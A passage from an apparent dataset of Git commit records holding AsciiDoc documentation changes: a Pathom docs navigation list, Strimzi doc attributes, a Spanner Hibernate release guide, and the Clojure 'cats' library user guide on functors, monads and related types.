helpers]\n* xref:graphql.adoc[GraphQL Integration]\n","old_contents":"* xref:introduction.adoc[Introduction]\n* xref:upgrade-guide.adoc[Upgrade Guide]\n* xref:connect.adoc[Pathom Connect]\n** xref:connect\/basics.adoc[The Basics]\n** xref:connect\/resolvers.adoc[Resolvers]\n** xref:connect\/connect-mutations.adoc[Connect Mutations]\n** xref:connect\/shared-resolvers.adoc[Shared Resolvers]\n** xref:connect\/thread-pool.adoc[Using Thread Pool]\n** xref:connect\/readers.adoc[Connect Readers]\n** xref:connect\/indexes.adoc[Understanding the Indexes]\n** xref:connect\/exploration.adoc[Exploration with Pathom Viz]\n* xref:plugins.adoc[Pathom Plugins]\n* xref:core.adoc[Pathom Core Engine]\n** xref:core\/getting-started.adoc[Getting Started]\n** xref:core\/parsers.adoc[Parsers]\n** xref:core\/readers.adoc[Readers]\n** xref:core\/entities.adoc[Entity]\n** xref:core\/error-handling.adoc[Error handling]\n** xref:core\/dispatch-helpers.adoc[Dispatch helpers]\n** xref:core\/mutations.adoc[Mutations]\n** xref:core\/request-cache.adoc[Request Caching]\n** xref:core\/placeholders.adoc[Placeholders]\n** xref:core\/trace.adoc[Tracing]\n** xref:core\/path-track.adoc[Path tracking]\n** xref:core\/async.adoc[Async parser]\n* xref:cljs-specs.adoc[Remove specs on Clojurescript]\n* xref:other-helpers.adoc[Other helpers]\n* 
xref:graphql.adoc[GraphQL Integration]\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"aea2834c10ea31dcc96428e0d10c52042326f868","subject":"Enable link even on section headings which are not in the TOC (#1045)","message":"Enable link even on section headings which are not in the TOC (#1045)\n\n","repos":"ppatierno\/kaas,scholzj\/barnabas,ppatierno\/kaas,scholzj\/barnabas","old_file":"documentation\/common\/attributes.adoc","new_file":"documentation\/common\/attributes.adoc","new_contents":"\/\/ AsciiDoc settings\n:data-uri!:\n:doctype: book\n:experimental:\n:idprefix:\n:imagesdir: images\n:numbered:\n:sectanchors!:\n:sectnums:\n:sectlinks:\n:source-highlighter: highlightjs\n:toc: left\n:linkattrs:\n:toclevels: 3\n\n\/\/ Name placeholders\n:ProductLongName: Strimzi\n:ProductName: Strimzi\n:ContextProduct: strimzi\n:ProductVersion: master\n:OpenShiftName: OpenShift\n:OpenShiftLongName: OpenShift Origin\n:OpenShiftVersion: 3.9 and later\n:KubernetesName: Kubernetes\n:KubernetesLongName: Kubernetes\n:KubernetesVersion: 1.9 and later\n:ProductPlatformName: {OpenShiftName} or {KubernetesName}\n:ProductPlatformLongName: {OpenShiftLongName} or {KubernetesLongName}\n:Namespace: {OpenShiftName} project or {KubernetesName} namespace\n:Namespaces: {OpenShiftName} projects or {KubernetesName} namespaces\n\n\/\/ Source and download links\n:ReleaseDownload: https:\/\/github.com\/strimzi\/strimzi-kafka-operator\/releases[GitHub^]\n\n\/\/ Helm Chart\n:ChartName: strimzi-kafka-operator\n:ChartReleaseCoordinate: strimzi\/strimzi-kafka-operator\n:ChartRepositoryUrl: http:\/\/strimzi.io\/charts\/\n\n\/\/ External links\n:KafkaRacks: link:https:\/\/kafka.apache.org\/documentation\/#basic_ops_racks[Kafka racks documentation^]\n:K8sAffinity: link:https:\/\/kubernetes.io\/docs\/concepts\/configuration\/assign-pod-node\/[Kubernetes node and pod affinity documentation^]\n:K8sTolerations: link:https:\/\/kubernetes.io\/docs\/concepts\/configuration\/taint-and-toleration\/[Kubernetes taints and tolerations^]\n:K8sEmptyDir: link:https:\/\/kubernetes.io\/docs\/concepts\/storage\/volumes\/#emptydir[`emptyDir` volumes^]\n:K8sPersistentVolumeClaims: link:https:\/\/kubernetes.io\/docs\/concepts\/storage\/dynamic-provisioning\/[Persistent Volume Claims^]\n:K8sLocalPersistentVolumes: link:https:\/\/kubernetes.io\/docs\/concepts\/storage\/volumes\/#local[Local persistent volumes^]\n:K8SStorageClass: link:https:\/\/kubernetes.io\/docs\/concepts\/storage\/storage-classes\/[Storage Class^]\n:K8sMeaningOfCpu: link:https:\/\/kubernetes.io\/docs\/concepts\/configuration\/manage-compute-resources-container\/#meaning-of-cpu[Meaning of CPU^]\n:K8sMeaningOfMemory: link:https:\/\/kubernetes.io\/docs\/concepts\/configuration\/manage-compute-resources-container\/#meaning-of-memory[Meaning of memory^]\n:K8sManagingComputingResources: link:https:\/\/kubernetes.io\/docs\/concepts\/configuration\/manage-compute-resources-container\/[Managing Compute Resources for Containers^]\n:K8sLivenessReadinessProbes: link:https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-liveness-readiness-probes\/[Configure Liveness and Readiness Probes^]\n\n\n:ApacheKafkaBrokerConfig: link:http:\/\/kafka.apache.org\/20\/documentation.html#brokerconfigs[Apache Kafka documentation^]\n:ApacheKafkaConnectConfig: link:http:\/\/kafka.apache.org\/20\/documentation.html#connectconfigs[Apache Kafka documentation^]\n:ApacheZookeeperConfig: link:http:\/\/zookeeper.apache.org\/doc\/r3.4.13\/zookeeperAdmin.html[Zookeeper 
documentation^]\n:ApacheKafkaConsumerConfig: link:http:\/\/kafka.apache.org\/20\/documentation.html#newconsumerconfigs[Apache Kafka documentation^]\n:ApacheKafkaProducerConfig: link:http:\/\/kafka.apache.org\/20\/documentation.html#producerconfigs[Apache Kafka documentation^]\n\n:JMXExporter: link:https:\/\/github.com\/prometheus\/jmx_exporter[JMX Exporter documentation^]\n\n\/\/ Docker image names\n:DockerTag: {ProductVersion}\n:DockerRepository: https:\/\/hub.docker.com\/u\/strimzi[Docker Hub^]\n:DockerZookeeper: strimzi\/zookeeper:{DockerTag}\n:DockerKafka: strimzi\/kafka:{DockerTag}\n:DockerKafkaConnect: strimzi\/kafka-connect:{DockerTag}\n:DockerKafkaConnectS2I: strimzi\/kafka-connect-s2i:{DockerTag}\n:DockerTopicController: strimzi\/topic-controller:{DockerTag}\n:DockerImageUser: kafka:kafka\n\n\/\/ API Versions\n:KafkaApiVersion: kafka.strimzi.io\/v1alpha1\n:KafkaConnectApiVersion: kafka.strimzi.io\/v1alpha1\n:KafkaConnectS2IApiVersion: kafka.strimzi.io\/v1alpha1\n:KafkaTopicApiVersion: kafka.strimzi.io\/v1alpha1\n:KafkaUserApiVersion: kafka.strimzi.io\/v1alpha1\n\n\/\/ Section enablers\n:Kubernetes:\n:Helm:\n:InstallationAppendix:\n:MetricsAppendix:\n:Downloading:\n:SecurityImg:\n","old_contents":"\/\/ AsciiDoc settings\n:data-uri!:\n:doctype: book\n:experimental:\n:idprefix:\n:imagesdir: images\n:numbered:\n:sectanchors!:\n:sectnums:\n:source-highlighter: highlightjs\n:toc: left\n:linkattrs:\n:toclevels: 3\n\n\/\/ Name placeholders\n:ProductLongName: Strimzi\n:ProductName: Strimzi\n:ContextProduct: strimzi\n:ProductVersion: master\n:OpenShiftName: OpenShift\n:OpenShiftLongName: OpenShift Origin\n:OpenShiftVersion: 3.9 and later\n:KubernetesName: Kubernetes\n:KubernetesLongName: Kubernetes\n:KubernetesVersion: 1.9 and later\n:ProductPlatformName: {OpenShiftName} or {KubernetesName}\n:ProductPlatformLongName: {OpenShiftLongName} or {KubernetesLongName}\n:Namespace: {OpenShiftName} project or {KubernetesName} namespace\n:Namespaces: {OpenShiftName} projects or {KubernetesName} namespaces\n\n\/\/ Source and download links\n:ReleaseDownload: https:\/\/github.com\/strimzi\/strimzi-kafka-operator\/releases[GitHub^]\n\n\/\/ Helm Chart\n:ChartName: strimzi-kafka-operator\n:ChartReleaseCoordinate: strimzi\/strimzi-kafka-operator\n:ChartRepositoryUrl: http:\/\/strimzi.io\/charts\/\n\n\/\/ External links\n:KafkaRacks: link:https:\/\/kafka.apache.org\/documentation\/#basic_ops_racks[Kafka racks documentation^]\n:K8sAffinity: link:https:\/\/kubernetes.io\/docs\/concepts\/configuration\/assign-pod-node\/[Kubernetes node and pod affinity documentation^]\n:K8sTolerations: link:https:\/\/kubernetes.io\/docs\/concepts\/configuration\/taint-and-toleration\/[Kubernetes taints and tolerations^]\n:K8sEmptyDir: link:https:\/\/kubernetes.io\/docs\/concepts\/storage\/volumes\/#emptydir[`emptyDir` volumes^]\n:K8sPersistentVolumeClaims: link:https:\/\/kubernetes.io\/docs\/concepts\/storage\/dynamic-provisioning\/[Persistent Volume Claims^]\n:K8sLocalPersistentVolumes: link:https:\/\/kubernetes.io\/docs\/concepts\/storage\/volumes\/#local[Local persistent volumes^]\n:K8SStorageClass: link:https:\/\/kubernetes.io\/docs\/concepts\/storage\/storage-classes\/[Storage Class^]\n:K8sMeaningOfCpu: link:https:\/\/kubernetes.io\/docs\/concepts\/configuration\/manage-compute-resources-container\/#meaning-of-cpu[Meaning of CPU^]\n:K8sMeaningOfMemory: link:https:\/\/kubernetes.io\/docs\/concepts\/configuration\/manage-compute-resources-container\/#meaning-of-memory[Meaning of memory^]\n:K8sManagingComputingResources: 
link:https:\/\/kubernetes.io\/docs\/concepts\/configuration\/manage-compute-resources-container\/[Managing Compute Resources for Containers^]\n:K8sLivenessReadinessProbes: link:https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-liveness-readiness-probes\/[Configure Liveness and Readiness Probes^]\n\n\n:ApacheKafkaBrokerConfig: link:http:\/\/kafka.apache.org\/20\/documentation.html#brokerconfigs[Apache Kafka documentation^]\n:ApacheKafkaConnectConfig: link:http:\/\/kafka.apache.org\/20\/documentation.html#connectconfigs[Apache Kafka documentation^]\n:ApacheZookeeperConfig: link:http:\/\/zookeeper.apache.org\/doc\/r3.4.13\/zookeeperAdmin.html[Zookeeper documentation^]\n:ApacheKafkaConsumerConfig: link:http:\/\/kafka.apache.org\/20\/documentation.html#newconsumerconfigs[Apache Kafka documentation^]\n:ApacheKafkaProducerConfig: link:http:\/\/kafka.apache.org\/20\/documentation.html#producerconfigs[Apache Kafka documentation^]\n\n:JMXExporter: link:https:\/\/github.com\/prometheus\/jmx_exporter[JMX Exporter documentation^]\n\n\/\/ Docker image names\n:DockerTag: {ProductVersion}\n:DockerRepository: https:\/\/hub.docker.com\/u\/strimzi[Docker Hub^]\n:DockerZookeeper: strimzi\/zookeeper:{DockerTag}\n:DockerKafka: strimzi\/kafka:{DockerTag}\n:DockerKafkaConnect: strimzi\/kafka-connect:{DockerTag}\n:DockerKafkaConnectS2I: strimzi\/kafka-connect-s2i:{DockerTag}\n:DockerTopicController: strimzi\/topic-controller:{DockerTag}\n:DockerImageUser: kafka:kafka\n\n\/\/ API Versions\n:KafkaApiVersion: kafka.strimzi.io\/v1alpha1\n:KafkaConnectApiVersion: kafka.strimzi.io\/v1alpha1\n:KafkaConnectS2IApiVersion: kafka.strimzi.io\/v1alpha1\n:KafkaTopicApiVersion: kafka.strimzi.io\/v1alpha1\n:KafkaUserApiVersion: kafka.strimzi.io\/v1alpha1\n\n\/\/ Section enablers\n:Kubernetes:\n:Helm:\n:InstallationAppendix:\n:MetricsAppendix:\n:Downloading:\n:SecurityImg:\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ac4a20eb9282d1662ec66fb052ff1e46292dd821","subject":"Update RELEASING.adoc (#162)","message":"Update RELEASING.adoc (#162)\n\n","repos":"GoogleCloudPlatform\/google-cloud-spanner-hibernate,GoogleCloudPlatform\/google-cloud-spanner-hibernate,GoogleCloudPlatform\/google-cloud-spanner-hibernate","old_file":"RELEASING.adoc","new_file":"RELEASING.adoc","new_contents":"# How to Release to Maven Central\n\n## Snapshots\n\nA commit to the `master` branch will automatically trigger the `prod:cloud-java-frameworks\/google-cloud-spanner-hibernate\/continuous` job that will publish snapshots to Sonatype Snapshots repository. The scripts can be found in the `.kokoro` directory.\n\n## Releases\n\n. Run the `prod:cloud-java-frameworks\/google-cloud-spanner-hibernate\/stage` Kokoro job.\n\n. In the build logs, find the name of the ID of the staging repository. You should see a log line that looks something like this:\n```\n[INFO] * Created staging repository with ID \"comgooglecloud-1345\".\n```\nThe ID in this case is `comgooglecloud-1345`.\n\n. Verify staged artifacts at http:\/\/oss.sonatype.org.\n(If you don't have access to `com.google.cloud`, please make a request similar to https:\/\/issues.sonatype.org\/browse\/OSSRH-52371[this one] and ask for support from someone who already has access to this group ID.)\n\n. If you want to drop the staged artifacts, run the `prod:cloud-java-frameworks\/google-cloud-spanner-hibernate\/drop` Kokoro job, while providing the staging repository ID as an environment variable like `STAGING_REPOSITORY_ID=comgooglecloud-1345`.\n\n. 
If you want to release the staged artifacts, run the `prod:cloud-java-frameworks\/google-cloud-spanner-hibernate\/promote` Kokoro job, while providing the staging repository ID as an environment variable like `STAGING_REPOSITORY_ID=comgooglecloud-1345`.\n\n. Verify that the new version has been published to Maven Central by checking https:\/\/repo.maven.apache.org\/maven2\/com\/google\/cloud\/google-cloud-spanner-hibernate-dialect\/[here]. This might take a while.\n\n. Open a PR to update the release version in the https:\/\/github.com\/GoogleCloudPlatform\/java-docs-samples\/blob\/master\/spanner\/hibernate\/pom.xml[sample app]. Here's a https:\/\/github.com\/GoogleCloudPlatform\/java-docs-samples\/pull\/1617[sample PR].\n\n. Update the version in the https:\/\/codelabs.developers.google.com\/codelabs\/cloud-spanner-hibernate\/[codelab].\n\n. https:\/\/github.com\/GoogleCloudPlatform\/google-cloud-spanner-hibernate\/releases[Create] a new release on GitHub.\n\n. Increment the project base version. For example, from `0.1.0.BUILD-SNAPSHOT` to `0.2.0.BUILD-SNAPSHOT`.\n","old_contents":"# How to Release to Maven Central\n\n## Snapshots\n\nA commit to the `master` branch will automatically trigger the `prod:cloud-java-frameworks\/google-cloud-spanner-hibernate\/continuous` job that will publish snapshots to Sonatype Snapshots repository. The scripts can be found in the `.kokoro` directory.\n\n## Releases\n\n. Run the `prod:cloud-java-frameworks\/google-cloud-spanner-hibernate\/stage` Kokoro job.\n\n. In the build logs, find the name of the ID of the staging repository. You should see a log line that looks something like this:\n```\n[INFO] * Created staging repository with ID \"comgooglecloud-1345\".\n```\nThe ID in this case is `comgooglecloud-1345`.\n\n. Verify staged artifacts at http:\/\/oss.sonatype.org.\n(If you don't have access to `com.google.cloud`, please make a request similar to https:\/\/issues.sonatype.org\/browse\/OSSRH-52371[this one] and ask for support from someone who already has access to this group ID.)\n\n. If you want to drop the staged artifacts, run the `prod:cloud-java-frameworks\/google-cloud-spanner-hibernate\/drop` Kokoro job, while providing the staging repository ID as an environment variable like `STAGING_REPOSITORY_ID=comgooglecloud-1345`.\n\n. If you want to release the staged artifacts, run the `prod:cloud-java-frameworks\/google-cloud-spanner-hibernate\/promote` Kokoro job, while providing the staging repository ID as an environment variable like `STAGING_REPOSITORY_ID=comgooglecloud-1345`.\n\n. Verify that the new version has been published to Maven Central by checking https:\/\/repo.maven.apache.org\/maven2\/com\/google\/cloud\/google-cloud-spanner-hibernate-dialect\/[here].\n\n. Open a PR to update the release version in the https:\/\/github.com\/GoogleCloudPlatform\/java-docs-samples\/blob\/master\/spanner\/hibernate\/pom.xml[sample app]. Here's a https:\/\/github.com\/GoogleCloudPlatform\/java-docs-samples\/pull\/1617[sample PR].\n\n. https:\/\/github.com\/GoogleCloudPlatform\/google-cloud-spanner-hibernate\/releases[Create] a new release on GitHub.\n\n. Increment the project base version. 
For example, from `0.1.0.BUILD-SNAPSHOT` to `0.2.0.BUILD-SNAPSHOT`.\n","returncode":0,"stderr":"","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"505985b21971aa59faada78d6d0ce3e536698852","subject":"Rename Clojure with clojure in asciidoctor codeblock attribute.","message":"Rename Clojure with clojure in asciidoctor codeblock attribute.\n","repos":"mccraigmccraig\/cats,alesguzik\/cats,tcsavage\/cats,yurrriq\/cats,funcool\/cats,OlegTheCat\/cats","old_file":"doc\/cats.adoc","new_file":"doc\/cats.adoc","new_contents":"= Cats Documentation\nAndrey Antukh & Alejandro G\u00f3mez\n0.4.0-SNAPSHOT\n:toc: left\n:numbered:\n:source-highlighter: pygments\n:pygments-style: friendly\n\nimage:logo.png[cats logo]\n\n== Introduction\n\nCategory Theory abstractions for Clojure.\n\n=== Why another library?\n\nBecause the cats library:\n\n- targets both of the most-used Clojure implementations: *Clojure (jvm)* and *ClojureScript(js)*\n- aims to have the simplest implementation of the supported abstractions.\n- aims to provide more abstractions than just monads.\n- has documentation as a first-class citizen.\n- is licensed under a permissive license (compared to other libraries): BSD (2-Clause)\n\n\n== Project Maturity\n\nSince _cats_ is a young project, there can be some link:api\/index.html#id[API] breakage.\n\n\n== Install\n\nThis section covers installing _cats_.\n\n\n=== Leiningen\n\nThe simplest way to use _cats_ in a Clojure project is by including\nit as a dependency in your *_project.clj_*:\n\n[source,clojure]\n----\n[cats \"0.4.0-SNAPSHOT\"]\n----\n\n\n=== Maven\n\nAlso, you can use it with Maven. First, add the Clojars repository:\n\n[source,xml]\n----\n<repository>\n <id>clojars.org<\/id>\n <url>http:\/\/clojars.org\/repo<\/url>\n<\/repository>\n----\n\nThen for cats:\n\n[source,xml]\n----\n<dependency>\n <groupId>cats<\/groupId>\n <artifactId>cats<\/artifactId>\n <version>0.4.0-SNAPSHOT<\/version>\n<\/dependency>\n----\n\n\n=== Get the Code\n\n_cats_ is open source and can be found on link:https:\/\/github.com\/funcool\/cats[github].\n\nYou can clone the public repository with this command:\n\n[source,text]\n----\ngit clone https:\/\/github.com\/funcool\/cats\n----\n\n\n== User Guide\n\nThis section introduces almost all the category theory abstractions that the _cats_ library\nsupports.\n\nWe will use the _Maybe_ type for the example snippets, because it has support for all\nthe abstractions and it is very easy to understand. You can read more about it in the next\nsection of the documentation.\n\n\n=== Functor\n\nLet's start with the functor. The Functor represents some sort of \"computational context\", and the\nabstraction consists of one unique function: *fmap*.\n\n.Signature of *fmap* function\n[source, clojure]\n----\n(fmap [f fv])\n----\n\nThe higher-order function *fmap* takes a plain function as the first parameter and\na value wrapped in a functor context as the second parameter. It extracts the inner value,\napplies the function to it, and returns the result wrapped in the same type as the second\nparameter.\n\nBut, what is the *functor context*? It sounds more complex than it is. 
A Functor\nwrapper is any type that acts as \"Box\" and implements the `Context` and `Functor` protocols.\n\n.One good example of a functor is the *Maybe* type:\n[source, clojure]\n----\n(require '[cats.monad.maybe :as maybe])\n\n;; The `just` function is one of the two constructors of Maybe\n\n(maybe\/just 2)\n;; => #<Just [2]>\n----\n\nLet's see one example using *fmap* over a *just* instance:\n\n.Example using fmap over a *just* instance.\n[source, clojure]\n----\n(require '[cats.core :as m]\n '[cats.monad.maybe :refer [just]])\n\n(m\/fmap inc (just 1))\n;; => #<Just [2]>\n----\n\nWe mentioned above that *fmap* extracts the value from the functor context. You will also want to\nextract values wrapped by *just* and you can do that with *from-maybe*.\n\n.Example using *from-maybe* to extract values wrapped by *just*.\n[source, clojure]\n----\n(require '[cats.monad.maybe :refer [just nothing from-maybe]])\n\n(from-maybe (just 1))\n;; => 1\n(from-maybe (nothing))\n;; => nil\n(from-maybe (nothing) 42)\n;; => 42\n----\n\nThe *Maybe* type also has another constructor: `nothing`. It represents the absence of a value.\nIt is a safe substitute for `nil` and may represent failure.\n\nLet's see what happens if we perform the same operation as the previous example over a *nothing*\ninstance:\n\n.Example using fmap over *nothing*.\n[source, clojure]\n----\n(fmap inc (nothing))\n;; => #<Nothing >\n----\n\nOh, awesome, instead of raising a `NullPointerException`, it just returns *nothing*. Another\nadvantage of using the functor abstraction is that it always returns a result\nof the same type as its second argument.\n\nLet's see an example of applying fmap over a Clojure vector:\n\n.Example using fmap over *vector*.\n[source, clojure]\n----\n(fmap inc [1 2 3])\n;; => [2 3 4]\n----\n\nThe main difference compared to Clojure's map function is that\nmap returns lazy seqs no matter what collection we pass to it:\n\n[source, clojure]\n----\n(type (map inc [1 2 3]))\n;; => clojure.lang.LazySeq (cljs.core\/LazySeq in ClojureScript)\n----\n\nBut why can we pass vectors to fmap? Because some Clojure container types like vectors,\nlists and sets also implement the functor abstraction.\n\n
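For instance, here is a small illustration of our own (not one of the original examples; it assumes the `cats.builtin` extensions are loaded, as in the motivation example later in this guide):\n\n[source, clojure]\n----\n(require '[cats.core :refer [fmap]]\n '[cats.builtin])\n\n;; fmap preserves the container type for sets and lists too\n(fmap inc #{1 2 3})\n;; => #{2 3 4} (printed element order of a set may vary)\n\n(fmap inc '(1 2 3))\n;; => (2 3 4)\n----\n\n\n=== Applicative\n\nLet's continue with applicative functors. 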
The Applicative Functor represents\nsome sort of \"computational context\" like a plain Functor, but with the ability to\nexecute a function wrapped in the same context.\n\nThe Applicative Functor abstraction consists of two functions: *fapply* and\n*pure*.\n\n.Signature of *fapply* function\n[source, clojure]\n----\n(fapply [af av])\n----\n\nNOTE: the *pure* function will be explained later.\n\nThe use case for Applicative Functors is much the same as plain Functors: safe\nevaluation of some computation in a context.\n\nLet's see an example to better understand the differences between functor and\napplicative functor:\n\nImagine you have some factory function that, depending on the language, returns a\ngreeter function, and you only support a few languages.\n\n\n[source, clojure]\n----\n(defn make-greeter\n [^String lang]\n (condp = lang\n \"es\" (fn [name] (str \"Hola \" name))\n \"en\" (fn [name] (str \"Hello \" name))\n nil))\n----\n\nNow, before using the resulting greeter you should always defensively check whether the returned\ngreeter is a valid function or a nil value.\n\nLet's convert this factory to use the Maybe type:\n\n[source, clojure]\n----\n(defn make-greeter\n [^String lang]\n (condp = lang\n \"es\" (just (fn [name] (str \"Hola \" name)))\n \"en\" (just (fn [name] (str \"Hello \" name)))\n (nothing)))\n----\n\nAs you can see, this version of the factory differs only slightly from the\noriginal implementation. And this tiny change gives you a new superpower: you\ncan apply the returned greeter to any value without a defensive nil check:\n\n[source, clojure]\n----\n(fapply (make-greeter \"es\") (just \"Alex\"))\n;; => #<Just [Hola Alex]>\n\n(fapply (make-greeter \"en\") (just \"Alex\"))\n;; => #<Just [Hello Alex]>\n\n(fapply (make-greeter \"it\") (just \"Alex\"))\n;; => #<Nothing >\n----\n\nMoreover, the applicative functor comes with the *pure* function, whose main purpose is\nto put a value in a side-effect-free context of the current type.\n\nExamples:\n\n[source, clojure]\n----\n(require '[cats.core :refer [pure]]\n '[cats.monad.maybe :as maybe]\n '[cats.monad.either :as either])\n\n(pure maybe\/maybe-monad 5)\n;; => #<Just [5]>\n\n(pure either\/either-monad :bar)\n;; => #<Either [:bar :right]>\n----\n\nIf you do not understand the purpose of the *pure* function, the next section\nshould clarify it.\n\n\n=== Monad\n\nMonads are the most discussed programming concept to come from category theory. Like functors and\napplicatives, monads deal with data in contexts.\n\nAdditionally, monads can also transform contexts by unwrapping data, applying functions to it and\nputting new values in a completely different context.\n\nThe monad abstraction consists of two functions: *bind* and *return*.\n\n.Bind function signature.\n[source,clojure]\n----\n(bind [mv f])\n----\n\nAs you can see, bind works much like a Functor but with inverted arguments. The main difference is\nthat in a monad, the function is responsible for wrapping a returned value in a context.\n\n.Example usage of the bind higher-order function.\n[source,clojure]\n----\n(bind (just 1)\n (fn [v] (just (inc v))))\n----\n\nOne of the key features of the bind function is that any computation executed within the context of\nbind (monad) knows the context type implicitly. 
With this, if you apply some computation over some\nmonadic value and you want to return the result in the same container context but don't know\nwhat that container is, you can use the `return` or `pure` functions:\n\n.Usage of return function in bind context.\n[source,clojure]\n----\n(bind (just 1)\n (fn [v]\n (return (inc v))))\n;; => #<Just [2]>\n----\n\nThe `return` or `pure` functions, when called with one argument, try to use the dynamic scope context\nvalue that's set internally by the `bind` function. Therefore, you can't use them with one argument outside of a `bind` context.\n\nWe can now compose any number of computations using monad *bind*\nfunctions. But observe what happens when the number of computations increases:\n\n.Composability example of bind function.\n[source, clojure]\n----\n(bind (just 1)\n (fn [a]\n (bind (just (inc a))\n (fn [b]\n (return (* b 2))))))\n----\n\nThis can quickly lead to callback hell. To solve this, _cats_ comes with a powerful\nmacro: *mlet*.\n\n.Previous example but using *mlet* macro.\n[source, clojure]\n----\n(mlet [a (just 1)\n b (just (inc a))]\n (return (* b 2)))\n----\n\nNOTE: If you are coming from Haskell, mlet represents the *do-syntax*.\n\n\nIf you want to use regular (non-monadic) let bindings inside an `mlet` block, you can do so using\n`:let` and a binding vector inside the mlet bindings:\n\n[source, clojure]\n----\n(mlet [a (just 1)\n b (just (inc a))\n :let [z (+ a b)]]\n (return (* z 2)))\n----\n\n\n=== Monad Transformers\n\n==== Motivation\n\nWe can combine two functors and get a new one automatically. Given any two functors _a_ and _b_,\nwe can implement a generic `fmap` for the type _a (b Any)_; we'll call it fmap2:\n\n[source, clojure]\n----\n(ns functor.example\n (:require [cats.core :refer [fmap]]\n [cats.monad.maybe :refer [just]])\n (:use [cats.builtin]))\n\n(defn fmap2\n [f fv]\n (fmap (partial fmap f) fv))\n\n; Here, 'a' is [] and 'b' is Maybe, so the type of the\n; combined functor is a vector of Maybe values that could\n; contain a value of any type.\n(fmap2 inc [(just 1) (just 2)])\n;;=> [#<Just [2]> #<Just [3]>]\n----\n\nHowever, monads don't compose as nicely as functors do. We have to actually implement\nthe composition ourselves.\n\nIn some circumstances we would like to combine the effects of two monads into another one. We call the\nresulting monad a monad transformer, which is the composition of a \"base\" and an \"inner\" monad. A\nmonad transformer is itself a monad.\n\n\n==== Using monad transformers\n\nLet's combine the effects of two monads: State and Maybe. We'll create the transformer\nusing State as the base monad since we want the resulting type to be a stateful computation\nthat may fail: `s -> Maybe (a, s)`.\n\nAlmost every monad implemented in _cats_ has a monad transformer for combining it with\nany other monad. 
The transformer functions take a Monad as their argument and they\nreturn a reified MonadTrans:\n\n[source, clojure]\n----\n(ns transformers.example\n (:require [cats.core :as m]\n [cats.data :as data]\n [cats.monad.maybe :as maybe]\n [cats.monad.state :as state]))\n\n(def maybe-state (state\/state-transformer maybe\/maybe-monad))\n\n(m\/with-monad maybe-state\n (state\/run-state (m\/return 42) {}))\n\n;;=> #<Just [#<Pair [42 {}]>]>\n----\n\nAs we can see in the example above, the return of the `maybe-state` monad creates a stateful\nfunction that yields a Maybe containing a pair (value, next state).\n\nYou probably noticed that we had to wrap the state function invocation with `cats.core\/with-monad`.\nWhen working with monad transformers, we have to be explicit about what monad we are using to implement\nthe binding policy since there is no way to distinguish values of a transformer type from those of\na regular monad.\n\nThe `maybe-state` monad combines the semantics of both State and Maybe.\n\nLet's see it in action:\n\n[source, clojure]\n----\n(defn any-char\n \"A function that takes an input string as the state and\n consumes one character, yielding it as the value. The\n new state is the input string with the character consumed.\n\n It fails when there isn't a character to consume.\"\n [s]\n (if (clojure.string\/blank? s)\n (maybe\/nothing)\n (maybe\/just (data\/pair (first s)\n (.substring s 1)))))\n\n(m\/with-monad maybe-state\n (state\/run-state any-char \"Foo\"))\n;;=> #<Just [#<Pair [F oo]>]>\n\n(def any-two-chars\n (m\/with-monad maybe-state\n (m\/mlet [a any-char\n b any-char]\n (m\/return (str a b)))))\n\n(m\/with-monad maybe-state\n (state\/run-state any-two-chars \"Foo\"))\n;;=> #<Just [#<Pair [Fo o]>]>\n\n(m\/with-monad maybe-state\n (state\/run-state any-two-chars \"F\"))\n;;=> #<Nothing >\n\n; We also define a function for applying a parser to a given input\n(defn parse [parser input]\n (m\/with-monad maybe-state\n (let [parse-result (state\/run-state parser input)]\n (maybe\/from-maybe parse-result))))\n----\n\n
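To see `parse` in action, here is a brief usage sketch of our own; it is not part of the original document, and the printed result shapes are an assumption based on the definitions above:\n\n[source, clojure]\n----\n;; On success, parse unwraps the Maybe and yields the (value, state) pair\n(parse any-two-chars \"Hello\")\n;;=> #<Pair [He llo]>\n\n;; On failure, from-maybe turns Nothing into nil\n(parse any-two-chars \"H\")\n;;=> nil\n----\n\n== Monad types\n\nIn our examples we have seen two types that implement\nthe monad abstraction: Maybe and Either. But these are not the only ones.\nIn this section, we will explain the different\nmonad types supported by the _cats_ library.\n\n=== Maybe\n\nThis is one of the two most used monad types (also named Optional in other programming\nlanguages).\n\nMaybe\/Optional is a polymorphic type that represents encapsulation of an optional value; e.g. it is\nused as the return type of functions which may or may not return a meaningful value when they\nare applied. 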
It consists of either an empty constructor (called None or Nothing), or a constructor\nencapsulating the original data type A (written Just A or Some A).\n\n_cats_, implements two constructors:\n\n- `(just v)`: represents just a value in a context.\n- `(nothing)`: represents a failure or null.\n\n.Usage example of *Maybe* constructors.\n[source, clojure]\n----\n(require '[cats.monad.maybe :refer :all])\n(just 1)\n;; => #<Just [1]>\n(nothing)\n;; => #<Nothing >\n----\n\n\n=== Either\n\nEither is another type that represents a result of computation, but (in contrast with maybe)\nit can return some data with a failed computation result.\n\nIn _cats_ it has two constructors:\n\n- `(left v)`: represents a failure.\n- `(right v)`: represents a successful result.\n\n.Usage example of *Either* constructors.\n[source, clojure]\n----\n(require '[cats.monad.either :refer :all])\n\n(right :valid-value)\n;; => #<Right [:valid-value :right]>\n\n(left \"Error message\")\n;; => #<Either [Error message :left]>\n----\n\nNOTE: Either is also (like Maybe) Functor, Applicative Functor and Monad.\n\n\n=== Try\n\nAlso called Exception.\n\nThe `Try` type represents a computation that may either result in an exception\nor return a successfully computed value. It's similar to, but semantically\ndifferent from, the `Either` type.\n\nIt is an analogue of the try-catch block: it replaces try-catch's stack-based error\nhandling with heap-based error handling. Instead of having an exception thrown and\nhaving to deal with it immediately in the same thread, it disconnects the error\nhandling and recovery.\n\n.Usage example of *try-on* macro.\n[source, clojure]\n----\n(require '[cats.monad.exception :as exc])\n\n(exc\/try-on 1)\n;; => #<Success [1]>\n\n(exc\/try-on (+ 1 nil))\n;; => #<Failure [#<NullPointerException java.lang.NullPointerException>]>\n----\n\n_cats_ comes with other syntactic sugar macros: `try-or-else` that\nreturns a default value if a computation fails, and `try-or-recover` that lets\nyou handle the return value when executing a function with the exception as\nfirst parameter.\n\n\n.Usage example of `try-or-else` macro.\n[source, clojure]\n----\n(exc\/try-or-else (+ 1 nil) 2)\n;; => #<Success [2]>\n----\n\n.Usage example of `try-or-recover` macro.\n[source, clojure]\n----\n(exc\/try-or-recover (+ 